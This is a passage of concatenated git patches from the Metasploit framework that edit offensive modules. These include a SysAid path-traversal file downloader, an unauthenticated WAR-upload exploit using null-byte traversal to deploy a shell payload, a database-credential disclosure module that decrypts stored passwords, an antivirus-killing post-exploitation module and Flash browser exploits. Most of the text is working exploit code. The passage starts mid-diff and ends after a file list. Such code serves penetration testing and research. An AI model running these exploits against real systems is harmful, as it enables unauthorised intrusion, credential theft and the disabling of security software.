+      # /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
+      # This calculates how much traversal we need to do to get to the root.
+      position = error_path.index(large_traversal)
+      unless position.nil?
+        return '../' * (error_path[0, position].count('/') - 2)
       end
     end
   end
 
-
   def download_file (download_path)
     begin
       return send_request_cgi({
@@ -93,40 +89,38 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-
   def run
     # No point to continue if filepath is not specified
     if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
-      print_error("Please supply the path of the file you want to download.")
-      return
+      fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.')
+    end
+
+    print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
+    if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/
+      file_path = $3
     else
-      print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
-      if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/
-        filepath = $3
-      else
-        filepath = datastore['FILEPATH']
-      end
+      file_path = datastore['FILEPATH']
     end
 
     traversal_path = get_traversal_path
-    if traversal_path == nil
+    if traversal_path.nil?
       print_error("#{peer} - Could not get traversal path, using bruteforce to download the file")
       count = 1
       while count < 15
-        res = download_file(("../" * count) + filepath)
-        if res && res.code == 200
-          if res.body.to_s.bytesize != 0
-            break
-          end
+        res = download_file(('../' * count) + file_path)
+        if res && res.code == 200  && res.body.to_s.bytesize != 0
+          break
         end
         count += 1
       end
     else
-      res = download_file(traversal_path[0,traversal_path.length - 1] + filepath)
+      res = download_file(traversal_path[0,traversal_path.length - 1] + file_path)
     end
 
     if res && res.code == 200
-      if res.body.to_s.bytesize != 0
+      if res.body.to_s.bytesize == 0
+        fail_with(Failure::NoAccess, "#{peer} - 0 bytes returned, file does not exist or it is empty.")
+      else
         vprint_line(res.body.to_s)
         fname = File.basename(datastore['FILEPATH'])
 
@@ -138,11 +132,9 @@ class Metasploit3 < Msf::Auxiliary
           fname
         )
         print_good("File saved in: #{path}")
-      else
-        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
       end
     else
-      print_error("#{peer} - Failed to download file.")
+      fail_with(Failure::Unknown, "#{peer} - Failed to download file.")
     end
   end
 end

From 57c4a3387b4ae6e15fd811a0b5984ecc6ad45a29 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 12:09:18 -0500
Subject: [PATCH 0817/1013] Fix paths for windows and cleanup

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb   | 37 ++++++++++++-------
 1 file changed, 23 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index d38a7b1687..c720e68f6b 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'SysAid Help Desk rdslogs Arbitrary File Upload',
+      'Name'        => 'SysAid Help Desk 'rdslogs' Arbitrary File Upload',
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
         The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
@@ -62,6 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def check
     servlet_path = 'rdslogs'
     bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+
     res = send_request_cgi({
       'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
       'method' => 'POST',
@@ -69,7 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'rdsName' => bogus_file
       }
     })
-    if res and res.code == 200
+
+    if res && res.code == 200
       return Exploit::CheckCode::Detected
     end
   end
@@ -103,24 +105,31 @@ class Metasploit3 < Msf::Exploit::Remote
       'data' => Zlib::Deflate.deflate(war_payload),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
-        'rdsName' => tomcat_path + app_base + ".war" + "\x00"
+        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
       }
     })
 
     # The server either returns a 200 OK when the upload is successful.
-    if res and (res.code == 200)
-      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      " seconds for deployment")
-      register_files_for_cleanup("webapps/" + app_base + ".war")
-      sleep(datastore['SLEEP'])
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
     else
-      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
     end
 
-    print_status("#{peer} - Executing payload, wait for session...")
-    send_request_cgi({
-      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
-      'method' => 'GET'
-    })
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
   end
 end

From 00adbd7f644369afba33c66d8dd55285c900cf03 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 12:09:42 -0500
Subject: [PATCH 0818/1013] Fix quotes

---
 modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index c720e68f6b..7e3a02f8de 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'SysAid Help Desk 'rdslogs' Arbitrary File Upload',
+      'Name'        => "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
         The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated

From a54b58fc2437eee2bbd6e6ebef3593616fa7bd55 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 12:34:46 -0500
Subject: [PATCH 0819/1013] Fix port parsing and cleanup

---
 .../auxiliary/admin/http/sysaid_sql_creds.rb  | 114 +++++++++---------
 1 file changed, 60 insertions(+), 54 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
index ce617b5655..4524bea383 100644
--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -13,13 +13,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "SysAid Help Desk Database Credentials Disclosure",
+      'Name'           => 'SysAid Help Desk Database Credentials Disclosure',
       'Description' => %q{
-        This module exploits a vulnerability in SysAid Help Desk that allows
-        an unauthenticated user to download arbitrary files from the system. This is
-        used to download the server configuration file that contains the database username
-        and password, which is encrypted with a fixed key.
-        This module has been tested with SysAid 14.4 on Windows and Linux.
+        This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
+        user to download arbitrary files from the system. This is used to download the server
+        configuration file that contains the database username and password, which is encrypted
+        with a fixed key. This module has been tested with SysAid 14.4 on Windows and Linux.
         },
       'Author' =>
         [
@@ -28,17 +27,17 @@ class Metasploit3 < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', '2015-2996' ],
-          [ 'CVE', '2015-2998' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
+          ['CVE', '2015-2996'],
+          ['CVE', '2015-2998'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 
     register_options(
       [
         OptPort.new('RPORT', [true, 'The target port', 8080]),
-        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']),
       ], self.class)
   end
 
@@ -55,7 +54,6 @@ class Metasploit3 < Msf::Auxiliary
     plaintext
   end
 
-
   def run
     begin
       res = send_request_cgi({
@@ -66,8 +64,7 @@ class Metasploit3 < Msf::Auxiliary
         },
       })
     rescue Rex::ConnectionRefused
-      print_error("#{peer} - Could not connect.")
-      return
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect.")
     end
 
     if res && res.code == 200 && res.body.to_s.bytesize != 0
@@ -76,48 +73,57 @@ class Metasploit3 < Msf::Auxiliary
       database_url = /\<dbUrl\>(.*)\<\/dbUrl\>/.match(res.body.to_s)
       database_type = /\<dbType\>(.*)\<\/dbType\>/.match(res.body.to_s)
 
-      if username && encrypted_password && database_type && database_url
-        username = username.captures[0]
-        encrypted_password = encrypted_password.captures[0]
-        database_url = database_url.captures[0]
-        database_type = database_type.captures[0]
-        password = decrypt_password(encrypted_password[6..encrypted_password.length])
-        credential_core = report_credential_core({
-           password: password,
-           username: username
-        })
-
-        matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url)
-        if matches
-          begin
-            if database_url['localhost'] == 'localhost'
-              db_address = rhost
-            else
-              db_address = matches.captures[2]
-              db_address = (db_address.index(':') ? db_address[0, db_address.index(':')] : db_address)
-              db_address = Rex::Socket.getaddress(db_address, true)
-            end
-            database_login_data = {
-              address: db_address,
-              service_name: database_type,
-              protocol: 'tcp',
-              workspace_id: myworkspace_id,
-              core: credential_core,
-              status: Metasploit::Model::Login::Status::UNTRIED
-            }
-            create_credential_login(database_login_data)
-          # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
-          rescue SocketError
-            print_error "Could not resolve database server hostname."
-          end
-
-          print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
-          return
-        end
+      unless username && encrypted_password && database_type && database_url
+        fail_with(Failure::Unknown, "#{peer} - Failed to obtain database credentials.")
+      end
+
+      username = username.captures[0]
+      encrypted_password = encrypted_password.captures[0]
+      database_url = database_url.captures[0]
+      database_type = database_type.captures[0]
+      password = decrypt_password(encrypted_password[6..encrypted_password.length])
+      credential_core = report_credential_core({
+        password: password,
+        username: username
+      })
+
+      matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url)
+      if matches
+        begin
+          if database_url['localhost'] == 'localhost'
+            db_address = matches.captures[2]
+            db_port = db_address[(db_address.index(':') + 1)..(db_address.length - 1)].to_i
+            db_address = rhost
+          else
+            db_address = matches.captures[2]
+            if db_address.index(':')
+              db_address = db_address[0, db_address.index(':')]
+              db_port = db_address[db_address.index(':')..(db_address.length - 1)].to_i
+            else
+              db_port = 0
+            end
+            db_address = Rex::Socket.getaddress(db_address, true)
+          end
+          database_login_data = {
+            address: db_address,
+            service_name: database_type,
+            protocol: 'tcp',
+            port: db_port,
+            workspace_id: myworkspace_id,
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+          create_credential_login(database_login_data)
+        # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
+        rescue SocketError
+          fail_with(Failure::Unknown, 'Could not resolve database server hostname.')
+        end
+
+        print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
+        return
       end
-      print_error("#{peer} - Failed to obtain database credentials, response was: #{res.body}")
     else
-      print_error("#{peer} - Failed to obtain database credentials.")
+      fail_with(Failure::NotVulnerable, "#{peer} - Failed to obtain database credentials, response was: #{res.code}")
     end
   end
 

From 454dd59da8abbaf69563c5d8cd9ce9a4dc52760c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 13:37:30 -0500
Subject: [PATCH 0820/1013] Add vuln discoverers

---
 .../auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
index a6bd6eab9c..07eee136f6 100644
--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -30,7 +30,9 @@ class Metasploit3 < Msf::Auxiliary
       },
       'Author'      =>
         [
-          'Ramon de C Valle'
+          'David Benjamin', # Vulnerability discovery
+          'Adam Langley', # Vulnerability discovery
+          'Ramon de C Valle' # Metasploit module
         ],
       'License' => MSF_LICENSE,
       'Actions'     =>
@@ -57,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('CERT', [ true, 'The leaf certificate', nil]),
         OptString.new('KEY', [ true, "The leaf certificate's private key", nil]),
         OptString.new('PASSPHRASE', [ false, "The pass phrase for the leaf certificate's private key", nil]),
-        OptString.new('SUBJECT', [ false, "The subject field for the fake certificate", '/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com']),
+        OptString.new('SUBJECT', [ false, 'The subject field for the fake certificate', '/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com']),
         OptString.new('HOST', [ true, 'The server address', nil]),
         OptString.new('PORT', [ true, 'The server port', 443]),
         OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),

From 663bcbe53b51f1b9bd82d7f5e984278e6a8acc3e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 17 Jul 2015 13:46:02 -0500
Subject: [PATCH 0821/1013] Avoid checking these system process names

---
 modules/post/windows/manage/killav.rb | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index b0d88f4c2e..633dae0ada 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -26,6 +26,13 @@ class Metasploit4 < Msf::Post
     ))
   end
 
+  def skip_process_name?(process_name)
+    [
+      '[system process]',
+      'system'
+    ].include?(process_name)
+  end
+
   def run
     avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
                                   'av_hips_executables.txt')).strip
@@ -34,6 +41,7 @@ class Metasploit4 < Msf::Post
     processes_found = 0
     processes_killed = 0
     client.sys.process.get_processes().each do |x|
+      next if skip_process_name?(x['name'].downcase)
       vprint_status("Checking #{x['name'].downcase} ...")
       if avs.include?(x['name'].downcase)
         processes_found += 1

From 425a9dc266aa063c926c2c6ec40ef621a8afe73a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 17 Jul 2015 13:47:17 -0500
Subject: [PATCH 0822/1013] credit OJ

---
 modules/post/windows/manage/killav.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index 633dae0ada..fb86ce4401 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -19,7 +19,8 @@ class Metasploit4 < Msf::Post
       'Author'       => [
         'Marc-Andre Meloche (MadmanTM)',
         'Nikhil Mittal (Samratashok)',
-        'Jerome Athias'
+        'Jerome Athias',
+        'OJ Reeves'
       ],
       'Platform'     => ['win'],
       'SessionTypes' => ['meterpreter']

From 0bd1dc017e8c9557cf85a6e40717c6276a8faa38 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 17 Jul 2015 16:23:00 -0500
Subject: [PATCH 0823/1013] Update coverage information

---
 .../multi/browser/adobe_flash_opaque_background_uaf.rb   | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 8f35bbf391..ddd6263f1b 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -20,10 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
         7 setter of the flash.display.DisplayObject class. This module is an early release
         tested on:
 
+        Windows XP SP3, IE8 and Flash 18.0.0.194,
+        Windows XP SP3, IE 8 and Flash 18.0.0.203,
+        Windows XP SP3, Firefox and Flash 18.0.0.203,
+        Windows Vista SP2 + IE 9 and Flash 18.0.0.203,
+        Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
-        Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
+        Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and
@@ -54,6 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
           :source  => /script|headers/i,
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_XP ||
+            os =~ OperatingSystems::Match::WINDOWS_VISTA ||
             os =~ OperatingSystems::Match::WINDOWS_7 ||
             os =~ OperatingSystems::Match::WINDOWS_81
           end,

From f77f7d69161afc391ea3d7ed6e9f49654e59e73a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 17 Jul 2015 16:23:27 -0500
Subject: [PATCH 0824/1013] Bump rank

---
 .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index ddd6263f1b..7283dcea8a 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

From 29defc979bfc273ba3e68b9fc71a5e0e717b710b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 17 Jul 2015 16:57:37 -0500
Subject: [PATCH 0825/1013] Fix #5740, remove variable ROP for
 adobe_flashplayer_flash10o

---
 modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 4da472c537..3a7dcbd1c1 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
       #Target Addr=0x0c0c0c0c
       p = generate_rop_payload('java', payload.encoded)
     else
-      p = rop + payload.encoded
+      p = payload.encoded
     end
 
     arch = Rex::Arch.endian(my_target.arch)

From 7483e77bbac623981eb29cb8ed8fbb7c3b9ee656 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 18 Jul 2015 20:12:13 +0100
Subject: [PATCH 0826/1013] Fix Linux target by trying again if exploit fails

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb   | 103 +++++++++++++-----
 1 file changed, 78 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 7e3a02f8de..4c60e5559c 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -75,18 +75,66 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected
     end
   end
+  
+  
+  def pick_target
+    unless target.name == 'Automatic'
+      return target
+    end
+
+    print_status("#{peer} - Determining target")
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    url = upload_payload(os_finder_payload, false)
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], url),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /Linux/
+        register_files_for_cleanup('webapps/' + url)
+        return targets[1]
+      elsif res.body.to_s =~ /Windows/
+        register_files_for_cleanup('root/' + url)
+        return targets[2]
+      end
+    end
+
+    nil
+  end
+  
+  
+  def send_payload(war_payload, tomcat_path, app_base)
+    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
+    print_status("#{peer} - Uploading WAR file...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(war_payload),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
+      }
+    })
+    
+    # The server either returns a 200 OK when the upload is successful.
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+    else
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
+    end
+  end
 
 
   def exploit
-    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    tomcat_path = '../../../../'
-    servlet_path = 'rdslogs'
-
     # We need to create the upload directories before our first attempt to upload the WAR.
     print_status("#{peer} - Creating upload directory")
     bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
     send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
       'method' => 'POST',
       'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
       'ctype' => 'application/xml',
@@ -95,27 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
     war_payload = payload.encoded_war({ :app_name => app_base }).to_s
-
-    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
-    print_status("#{peer} - Uploading WAR file...")
-    res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
-      'method' => 'POST',
-      'data' => Zlib::Deflate.deflate(war_payload),
-      'ctype' => 'application/octet-stream',
-      'vars_get' => {
-        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
-      }
-    })
-
-    # The server either returns a 200 OK when the upload is successful.
-    if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
-      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
-    else
-      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
-    end
+    
+    send_payload(war_payload, 'tomcat/webapps/', app_base)
+    register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
 
     10.times do
       select(nil, nil, nil, 2)
@@ -131,5 +163,26 @@ class Metasploit3 < Msf::Exploit::Remote
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
     end
+    print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
+    
+    # OK this might be a Linux server, it's a different traversal path.
+    # Let's try again...
+    send_payload(war_payload, '', app_base)
+    register_files_for_cleanup("webapps/#{app_base}.war")
+    
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end    
   end
 end

From 70a2247941546d08355f11982c9e89bf12d5cf8d Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 18 Jul 2015 20:12:49 +0100
Subject: [PATCH 0827/1013] Pick target is not needed...

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb   | 30 -------------------
 1 file changed, 30 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 4c60e5559c..44b99294d6 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -77,36 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
   
   
-  def pick_target
-    unless target.name == 'Automatic'
-      return target
-    end
-
-    print_status("#{peer} - Determining target")
-    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
-    url = upload_payload(os_finder_payload, false)
-
-    res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], url),
-      'method' => 'GET',
-      'cookie' => @cookie,
-      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
-    })
-
-    if res && res.code == 200
-      if res.body.to_s =~ /Linux/
-        register_files_for_cleanup('webapps/' + url)
-        return targets[1]
-      elsif res.body.to_s =~ /Windows/
-        register_files_for_cleanup('root/' + url)
-        return targets[2]
-      end
-    end
-
-    nil
-  end
-  
-  
   def send_payload(war_payload, tomcat_path, app_base)
     # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
     print_status("#{peer} - Uploading WAR file...")

From 3fe165a2654186225e475b6698cc203199b1b6d0 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 18 Jul 2015 20:18:34 +0100
Subject: [PATCH 0828/1013] Remove whitespace at the end

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb        | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 44b99294d6..1999e30a0b 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected
     end
   end
-  
-  
+
+
   def send_payload(war_payload, tomcat_path, app_base)
     # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
     print_status("#{peer} - Uploading WAR file...")
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
       }
     })
-    
+
     # The server either returns a 200 OK when the upload is successful.
     if res && res.code == 200
       print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     app_base = rand_text_alphanumeric(4 + rand(32 - 4))
     war_payload = payload.encoded_war({ :app_name => app_base }).to_s
-    
+
     send_payload(war_payload, 'tomcat/webapps/', app_base)
     register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
 
@@ -134,12 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
       break if res.code == 200
     end
     print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
-    
+
     # OK this might be a Linux server, it's a different traversal path.
     # Let's try again...
     send_payload(war_payload, '', app_base)
     register_files_for_cleanup("webapps/#{app_base}.war")
-    
+
     10.times do
       select(nil, nil, nil, 2)
 
@@ -153,6 +153,6 @@ class Metasploit3 < Msf::Exploit::Remote
       break if res.nil?
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
-    end    
+    end
   end
 end

From ad86a729187118f2733a23d64d233639ee9ecc7a Mon Sep 17 00:00:00 2001
From: Jack64 <somethingsyouneverforget@gmail.com>
Date: Mon, 20 Jul 2015 01:16:58 +0100
Subject: [PATCH 0829/1013] send_sms + wlan_geolocate

---
 .../meterpreter/extensions/android/android.rb |  38 +++++-
 .../meterpreter/extensions/android/tlv.rb     |   7 ++
 .../ui/console/command_dispatcher/android.rb  | 109 +++++++++++++++++-
